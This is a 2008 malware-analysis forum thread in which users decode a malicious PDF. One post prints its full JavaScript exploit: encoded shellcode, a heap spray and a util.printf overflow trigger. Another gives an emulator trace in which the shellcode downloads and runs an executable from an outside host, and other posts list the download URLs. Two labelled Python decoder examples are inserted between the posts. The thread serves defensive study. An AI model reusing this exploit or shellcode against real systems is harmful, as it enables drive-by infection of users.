Malware Domain List

Malware Related => Malware Analysis => Topic started by: jimmyleo on November 16, 2008, 06:34:17 am

Title: PDF exploit issue
Post by: jimmyleo on November 16, 2008, 06:34:17 am
Original pdf exploit file is index.pdf.
I've got the plain stream with bobby's inflater in 3.tmp.
I renamed it as FLevel.txt, and then I decoded it to the second level as SLevel.txt.
But I'm confused with the following shellcode. How to decode it?
Any thoughts?


Title: Re: PDF exploit issue
Post by: bobby on November 16, 2008, 07:50:56 am
Shellcode is XORed with 0xEE.
Here is the download URL from the shellcode after XORing it with 0xEE:
hxxp://79.135.167.18/cgi-bin/index.cgi?fc413c500100f07002123510f6067317db1d02b55afdb30001080400000000170
Title: Re: PDF exploit issue
Post by: jimmyleo on November 16, 2008, 02:03:47 pm
hi bobby

thnx 4 your help.
how did you know the XOR value?
and how can I debug the shellcode?

Title: Re: PDF exploit issue
Post by: SysAdMini on November 16, 2008, 02:59:09 pm
Quote
how did you know the XOR value?
and how can I debug the shellcode?

Download xorsearch from http://blog.didierstevens.com/programs/xorsearch/

Save the shellcode in Malzilla.

run "XORSearch.exe -si -l 1000 hexfile.bin http"


or load the shellcode into IDA Pro, disassemble and find the xor value
Title: Re: PDF exploit issue
Post by: jimmyleo on November 16, 2008, 04:30:44 pm
yep I got it~~

thnx SysAdMini


and I've caught another exploit.

how about this?

there's maybe an ALPHA2 compression level finally?
Title: Re: PDF exploit issue
Post by: sowhat-x on November 16, 2008, 05:20:49 pm
That's as far as I can get for the time being...
Code: [Select]
lemiros=unescape("%u03eb%ueb59%ue805%ufff8%uffff%u494f%u4949%u4949%u5149%u565a%u5854%u3336%u5630%u3458%u3041%u3642%u4848%u4230%u3033%u4342%u5856%u4232%u4244%u3448%u3241%u4441%u4130%u5444%u4442%u4251%u4130%u4144%u5856%u5a34%u4238%u4a44%u4d4f%u4e4b%u3142%u354c%u544c%u4343%u4c49%u3648%u4b49%u434e%u5041%u3842%u5346%u504c%u4949%u4e44%u4f4c%u4e4b%u5045%u4e4a%u4e4b%u4f4f%u4f4f%u4f4f%u4742%u544e%u4949%u5949%u3949%u4c43%u4f4d%u534a%u4a49%u3949%u3949%u4949%u3144%u4d49%u4945%u5144%u4e49%u4845%u3346%u5144%u4d49%u5941%u5144%u4441%u4144%u4e4c%u4a45%u4144%u4e4d%u3847%u4e41%u494c%u564c%u3144%u4e47%u4b49%u494c%u4644%u3144%u4d47%u584d%u4a4c%u5746%u4c4f%u4c50%u4c4a%u4144%u4a48%u394c%u5644%u3144%u464b%u4f43%u3947%u4c42%u364c%u434f%u4e4d%u3941%u4c42%u4c48%u314c%u3550%u494d%u4d4e%u374b%u5742%u4c42%u4c48%u4c47%u3144%u4546%u3144%u4d4f%u4b4d%u494c%u454c%u544a%u574a%u394c%u354a%u4a4c%u5542%u4f4f%u3144%u5941%u4144%u4d4f%u4845%u594c%u554c%u354a%u574a%u494b%u494c%u554a%u4144%u3949%u394c%u454c%u5144%u5643%u4144%u3650%u414c%u354f%u5947%u4144%u4449%u4f43%u594d%u4c42%u4741%u4c49%u5949%u3949%u4949%u414c%u554f%u4946%u4c4b%u4c4f%u4648%u4c50%u4645%u4c43%u4144%u3441%u4f43%u494a%u4c42%u5741%u4a46%u4949%u5949%u5949%u514c%u354f%u484c%u4c4f%u4d4f%u5149%u4a47%u5149%u4e4e%u3643%u3149%u4a4f%u5149%u4c47%u514c%u5745%u4b49%u4144%u5445%u4f43%u4b49%u4c4c%u4648%u4c50%u5745%u5550%u494d%u594c%u4c45%u4f4a%u4b47%u4f4e%u4550%u4d4d%u394c%u394d%u4e41%u4f4e%u3949%u3949%u4a4c%u4549%u4c49%u4c49%u4c4c%u4c4f%u4c49%u4648%u4c50%u4645%u5144%u3445%u4c49%u4c4c%u3648%u4c50%u3649%u4c49%u3648%u4c50%u564d%u4a4c%u5549%u4345%u314e%u3549%u4e4e%u3642%u4c4a%u4c4b%u4c4f%u4c4c%u3648%u544b%u4c43%u4c42%u5344%u574b%u3747%u4a4c%u4549%u354c%u4741%u4b4f%u4648%u5648%u3648%u4d50%u4f4e%u4e4d%u4c49%u4e4b%u4f48%u4f4c%u4d4a%u4f4d%u4f4d%u4e4b%u4f4e%u4e4c%u4e4c%u3949%u4d50%u4f4e%u4e4d%u4c4c%u4e42%u4e4c%u4e4d%u4f4e%u4f46%u4d4d%u4f42%u4e4b%u4f4e%u4f4c%u4e4d%u4f48%u4e4b%u4e42%u4d4a%u4949%u4c50%u4f42%u4f47%u4d4e%u4e41%u4f4e%u4f4c%u5949%u4d4e%u4e41%u4f42%u4e4d%u4c4d%u4f41%u4e4b%u4f4e%u4f4a%u4f4d%u5949%u4d45%u4f48%u4f4a%u4f4d%u4d45%u4f42%u4f4b%u4e4b%u4f4a%u4e4b%u4e42%u4d4a%u5949%u4e4e%u4e4b%u4f45%u4f46%u4f48%u4f47%u3949%u4c4e%u4c4b%u4d45%u4d4d%u4f48%u4e50%u4f47%u4f45%u4f48%u4f4a%u4f4d%u4c4d%u4f48%u4d4f%u4f42%u4f45%u4f4e%u4d4a%u3949%u364a%u3746%u4746%u4742%u334c%u524f%u424f%u3644%u3645%u4743%u364a%u4744%u5641%u3647%u364f%u3743%u4250%u3643%u364f%u364d%u524f%u5747%u464f%u5744%u464b%u424f%u4647%u4645%u5746%u3645%u374a%u4645%u5250%u5742%u464a%u4742%u534f%u364a%u434d%u3343%u3341%u4842%u005a");
 var nades=unescape("%u0A0A%u0A0A");
 var makofamos=20;
 var nanor=makofamos+lemiros.length;
 while(nades.length<nanor)nades+=nades;
 var fadad=nades.substring(0,nanor);
 var lusibirasa=nades.substring(0,nades.length-nanor);
 while(lusibirasa.length+nanor<0x60000)lusibirasa=lusibirasa+lusibirasa+fadad;
 var vatekere=new Array();
 for(vener9=0;vener9<1200;vener9++)
 {
   vatekere[vener9]=lusibirasa+lemiros
 }
 var kekifidu1=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
 util.printf("%45000f",kekifidu1);
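The %uXXXX strings in the script above are what unescape() turns into the padding and the shellcode in memory. The decoder below is an added example, not part of sowhat-x's post or of Malzilla; it converts such a string to raw bytes (each %u unit is a little-endian 16-bit code unit) so the result can be fed to a disassembler or a shellcode analyzer. The sample is only the first five units of the lemiros string; everything else is constructed for the demo.

```python
import re
import struct

# Constructed sample: just the first five %u units of the lemiros string above,
# copied as an excerpt for the demo (the rest of the payload is not included).
SAMPLE = "%u03eb%ueb59%ue805%ufff8%uffff"

# One escape unit: %uXXXX (16-bit) or %XX (8-bit).
UNIT = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})")

def unescape_to_bytes(s: str) -> bytes:
    """Lay out a JavaScript unescape() string as the bytes it produces in memory.

    Each %uXXXX unit is a 16-bit code unit stored little-endian (low byte
    first), so "%u03eb" becomes b"\\xeb\\x03"; a %XX unit is a single byte.
    Any text that is not an escape raises instead of being skipped, because a
    stray character would shift every byte that follows it.
    """
    out = bytearray()
    pos = 0
    for m in UNIT.finditer(s):
        if m.start() != pos:
            raise ValueError(f"unexpected text at offset {pos}: {s[pos:m.start()]!r}")
        if m.group(1) is not None:
            out += struct.pack("<H", int(m.group(1), 16))
        else:
            out.append(int(m.group(2), 16))
        pos = m.end()
    if pos != len(s):
        raise ValueError(f"trailing text at offset {pos}: {s[pos:]!r}")
    return bytes(out)

if __name__ == "__main__":
    raw = unescape_to_bytes(SAMPLE)
    # eb 03 59 eb 05 e8 f8 ff ff ff: jmp +3 / pop ecx / jmp +5 / call -8,
    # the usual GetPC stub, which is why the %u string starts with "03eb".
    print(raw.hex(" "))
```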
Title: Re: PDF exploit issue
Post by: SysAdMini on November 16, 2008, 05:36:05 pm
Quote
how about this?

there's maybe an ALPHA2 compression level finally?

It's not simply xor encoded. Load it into IDA and you will see the algorithm.

But if you only wanna know what it does, then run it in Malzilla's shellcode analyzer.
Here is the output.
Code: [Select]
verbose = 0
Hook me Captain Cook!
userhooks.c:127 user_hook_ExitThread
ExitThread(32)
stepcount 13829
FARPROC WINAPI GetProcAddress (
     HMODULE hModule = 0x7c800000 =>
         none;
     LPCSTR lpProcName = 0x0041714e =>
           = "GetSystemDirectoryA";
) = 0x7c814eea;
FARPROC WINAPI GetProcAddress (
     HMODULE hModule = 0x7c800000 =>
         none;
     LPCSTR lpProcName = 0x00417162 =>
           = "WinExec";
) = 0x7c86136d;
FARPROC WINAPI GetProcAddress (
     HMODULE hModule = 0x7c800000 =>
         none;
     LPCSTR lpProcName = 0x0041716a =>
           = "ExitThread";
) = 0x7c80c058;
FARPROC WINAPI GetProcAddress (
     HMODULE hModule = 0x7c800000 =>
         none;
     LPCSTR lpProcName = 0x00417175 =>
           = "LoadLibraryA";
) = 0x7c801d77;
HMODULE LoadLibraryA (
     LPCTSTR lpFileName = 0x00417182 =>
           = "urlmon";
) = 0x7df20000;
FARPROC WINAPI GetProcAddress (
     HMODULE hModule = 0x7df20000 =>
         none;
     LPCSTR lpProcName = 0x00417189 =>
           = "URLDownloadToFileA";
) = 0x7df7b0bb;
UINT GetSystemDirectory (
     LPTSTR lpBuffer = 0x0012fe74 =>
         none;
     UINT uSize = 32;
) =  19;
HRESULT URLDownloadToFile (
     LPUNKNOWN pCaller = 0x00000000 =>
         none;
     LPCTSTR szURL = 0x0041719c =>
           = "http://beshragos.com/work/getexe.php?h=31";
     LPCTSTR szFileName = 0x0012fe74 =>
           = "c:\WINDOWS\system32\a.exe";
     DWORD dwReserved = 0;
     LPBINDSTATUSCALLBACK lpfnCB = 0;
) =  0;
UINT WINAPI WinExec (
     LPCSTR lpCmdLine = 0x0012fe74 =>
           = "c:\WINDOWS\system32\a.exe";
     UINT uCmdShow = 0;
) =  32;
void ExitThread (
     DWORD dwExitCode = 32;
) =  0;

Finished
Title: Re: PDF exploit issue
Post by: sowhat-x on November 16, 2008, 05:36:15 pm
/me thinks I got it eventually... thanks to bobby and Malzilla's libemu bindings, he-he...  ;D

Code: [Select]
hxxp://beshragos.com/work/getexe.php?h=31
Title: Re: PDF exploit issue
Post by: sowhat-x on November 16, 2008, 05:37:01 pm
Lmao - now that's what I call synchronization!  :)
Title: Re: PDF exploit issue
Post by: SysAdMini on November 16, 2008, 05:44:16 pm
Quote
Lmao - now that's what I call synchronization!  :)

Nice. Same answer within 10 seconds :)
Title: Re: PDF exploit issue
Post by: sowhat-x on November 16, 2008, 05:49:33 pm
Lol, got kinda confused with it... exactly what you said:
was testing different xor keys, until something kinda recognizable gets returned...
and when I understood this certainly couldn't be the case, I decided to go for the...
libemu one-click solution, he-he  :D
Title: Re: PDF exploit issue
Post by: bobby on November 16, 2008, 06:11:19 pm
There are a couple of shellcodes where Malzilla's Shellcode analyzer can't help.
In such a case, copy the shellcode to the HexView page and click on Disassemble.
Scroll down the disassembled content, and see if there is an error message.
If there is one, saying that there is an unexpected byte at some address, it means that from that address on there is content that needs to be decoded (e.g. XOR).
Scroll the disassembled content and search for the first occurrence of a XOR instruction, e.g. XOR [EBP], AL.
If XOR is using AL as the XOR key, search for what is put in AL. In most cases, just a couple of instructions before the XOR, you should see an instruction which puts something in AL (e.g. MOV AL, 0x000000EE). Now you have the XOR key.

Malzilla can do XOR decoding (HexView tab).

As for now, it can't do other operations that are also used for encrypting (ROR, ROL, ADD, SUB etc.)
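The key hunting that XORSearch automates and that bobby describes doing by hand in IDA, written out as an added example (not XORSearch's or Malzilla's code): every single-byte key is tried for XOR, and also for the ADD/SUB/ROL/ROR variants bobby says Malzilla cannot undo, and each decoding in which "http" appears is reported together with the string found there. The buffer and the URL in it are constructed placeholders for the demo, not the thread's shellcode.

```python
# Constructed sample for the demo: a few stub bytes, then a placeholder URL
# (not the one from the thread), the whole buffer XORed with the key 0xEE.
_PLAIN = b"\x90\x90\xeb\x05" + b"http://example.invalid/x.exe\x00" + b"\xcc"
SAMPLE = bytes(b ^ 0xEE for b in _PLAIN)

def rol8(b: int, n: int) -> int:
    """Rotate one byte left by n bits (0 <= n < 8)."""
    return ((b << n) | (b >> (8 - n))) & 0xFF if n else b

# Each entry is the *decode* step tried against the buffer, i.e. the inverse
# of what a decoder stub would apply: xor undoes XOR, add undoes SUB,
# sub undoes ADD, rol undoes ROR by k bits, ror undoes ROL by k bits.
TRANSFORMS = {
    "xor": lambda b, k: b ^ k,
    "add": lambda b, k: (b + k) & 0xFF,
    "sub": lambda b, k: (b - k) & 0xFF,
    "rol": lambda b, k: rol8(b, k),
    "ror": lambda b, k: rol8(b, 8 - k),
}

def decode(data: bytes, op: str, key: int) -> bytes:
    fn = TRANSFORMS[op]
    return bytes(fn(b, key) for b in data)

def printable_run(data: bytes, start: int) -> str:
    """Return the printable ASCII run starting at `start` (stops at NUL etc.)."""
    end = start
    while end < len(data) and 0x20 <= data[end] < 0x7F:
        end += 1
    return data[start:end].decode("ascii")

def search(data: bytes, marker: bytes = b"http") -> list:
    """Try every key for every transform; report (op, key, offset, string)
    for each decoding in which `marker` shows up."""
    hits = []
    for op in TRANSFORMS:
        keys = range(1, 8) if op in ("rol", "ror") else range(1, 256)
        for key in keys:
            plain = decode(data, op, key)
            off = plain.find(marker)
            if off != -1:
                hits.append((op, key, off, printable_run(plain, off)))
    return hits

if __name__ == "__main__":
    for op, key, off, text in search(SAMPLE):
        print(f"{op} key=0x{key:02x} offset={off}: {text}")
```

Key 0 is skipped because it is the identity for xor/add/sub; a plain `marker in data` check covers the unencoded case.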
Title: Re: PDF exploit issue
Post by: sowhat-x on November 16, 2008, 06:20:56 pm
Quote
Scroll down the disassembled content, and see if there is an error message.
If there is one, saying that there is an unexpected byte at some address,
it means that from that address on there is content that needs to be decoded (e.g. XOR).
Oh, that explains it now... doh, I'm an idiot, I thought that this error code
was some kind of internal limitation of the disasm engine or something...  :P
Title: Re: PDF exploit issue
Post by: bobby on November 16, 2008, 06:27:26 pm
Quote
Scroll down the disassembled content, and see if there is an error message.
If there is one, saying that there is an unexpected byte at some address,
it means that from that address on there is content that needs to be decoded (e.g. XOR).
Oh, that explains it now... doh, I'm an idiot, I thought that this error code
was some kind of internal limitation of the disasm engine or something...  :P
You will get the same error message in that case too.
Unfortunately, I use an older version of libdisasm - 0.21-pre1 ( http://bastard.sourceforge.net/libdisasm.html ), as there is no newer Pascal port of it.
I can update it, but now I have some more important items on Malzilla's ToDo list (working on Malzilla 2.0 - a total rewrite of the engine, based on a real DOM parser, which means that we wouldn't need Kalimero anymore, as Malzilla will know how to deal with e.g. GetElementById etc.)
Title: Re: PDF exploit issue
Post by: jimmyleo on November 17, 2008, 03:16:01 am
long time no see~~ sowhat-x ;)

I've also got some error message from the shellcode analyser, as follows:

Code: [Select]
verbose = 0
cpu error error accessing 0x42363501 not mapped

stepcount 16

Finished

and XORSearch & Malzilla's HexView are good for finding the XOR value~~